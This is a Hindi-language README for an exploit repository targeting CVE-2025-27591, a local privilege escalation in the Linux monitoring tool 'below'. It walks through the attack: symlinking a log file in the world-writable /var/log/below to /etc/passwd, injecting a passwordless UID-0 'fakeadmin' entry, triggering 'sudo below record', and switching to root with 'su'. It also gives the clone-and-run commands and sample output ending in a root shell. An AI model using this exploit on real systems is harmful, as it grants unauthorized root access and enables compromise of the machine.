
🔥 स्थानीय विशेषाधिकार वृद्धि एक्सप्लॉइट CVE-2025-27591 के लिए | Below में विश्व-लेखनीय लॉग निर्देशिका का दुरुपयोग करके /etc/passwd इंजेक्शन के माध्यम से रूट प्राप्त करता है
below में सिमलिंक दुरुपयोग के माध्यम से विशेषाधिकार वृद्धि🛑 अस्वीकरण: यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। अनधिकृत उपयोग अवैध हो सकता है।
below Facebook द्वारा लिनक्स सिस्टम के लिए विकसित एक प्रदर्शन निगरानी टूल है। पैच किए गए रिलीज़ से पहले के below संस्करण एक गंभीर कमजोरी से प्रभावित हैं जो अन-प्रिविलेज्ड उपयोगकर्ताओं को विश्व-लेखन योग्य लॉग निर्देशिकाओं और असुरक्षित लॉग हैंडलिंग का शोषण करके रूट तक पहुँचने की अनुमति देता है।
यह Bash स्क्रिप्ट निम्नलिखित कार्य करती है:
विश्व-लेखन योग्य निर्देशिका की जाँच:
/var/log/below विश्व-लेखन योग्य है (एक लाल झंडा)।सिमलिंक हमले की तैयारी:
error_root.log (यदि कोई हो) को हटाती है और /etc/passwd के लिए एक प्रतीकात्मक लिंक बनाती है।पेलोड निर्माण:
/etc/passwd में एक नकली रूट उपयोगकर्ता जोड़ती है:
fakeadmin::0:0:fakeadmin:/root:/bin/bash
लॉगिंग ट्रिगर:
sudo below record चलाकर कमजोर बाइनरी को लॉग लिखने के लिए बाध्य करती है।रूट एक्सेस प्राप्त करना:
su fakeadmin का उपयोग करती है।CVE-2025-27591/
├── exploit.sh
├── README.md
एक्सप्लॉइट चलाने से पहले, सुनिश्चित करें कि आपके पास निम्नलिखित हैं:
/usr/bin/below/var/log/belowsudo विशेषाधिकार: sudo below recordln (सिमलिंक बनाने के लिए)su (उपयोगकर्ता बदलने के लिए)timeout (निष्पादन समय को नियंत्रित करने के लिए)whoami (विशेषाधिकार जाँच के लिए)# 1. रिपॉजिटरी क्लोन करें
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591
# 2. स्क्रिप्ट को निष्पादन योग्य बनाएं
chmod +x exploit.sh
# 3. एक्सप्लॉइट चलाएं
./exploit.sh
[*] CVE-2025-27591 कमजोरी की जाँच की जा रही है...
[+] /var/log/below विश्व-लेखन योग्य है।
[!] मौजूदा लॉग फ़ाइल मिली: उसे हटाया जा रहा है...
[+] सिमलिंक बनाया गया: /var/log/below/error_root.log -> /etc/passwd
[*] /tmp/fakeadmin में दुर्भावनापूर्ण पंक्ति लिखी जा रही है
[*] 'sudo below record' के माध्यम से लॉगिंग ट्रिगर की जा रही है...
[+] 'below record' निष्पादित (या टाइमआउट) हुआ
[*] सिमलिंक के माध्यम से पेलोड को /etc/passwd में लिखने का प्रयास...
[+] पेलोड सफलतापूर्वक जोड़ा गया।
[*] 'su fakeadmin' का उपयोग करके रूट शेल में स्विच करने का प्रयास...
root@target:/# whoami
root
| फ़ील्ड | मान |
|---|
| CVE-ID | CVE-2025-27591 |
| गंभीरता | 🔥 गंभीर (CVSS ≈ 7.8 - 8.8) |
| हमला वेक्टर | स्थानीय |
| प्रभाव | रूट (UID=0) तक विशेषाधिकार वृद्धि |
| एक्सप्लॉइट प्रकार | सिमलिंक दुरुपयोग / लॉग फ़ाइल इंजेक्शन |
| प्रभावित ऐप | below – सामान्यतः /usr/bin/below के रूप में स्थापित |
| मूल कारण | अनुमति जाँच के बिना /var/log/below/ में असुरक्षित फ़ाइल लेखन |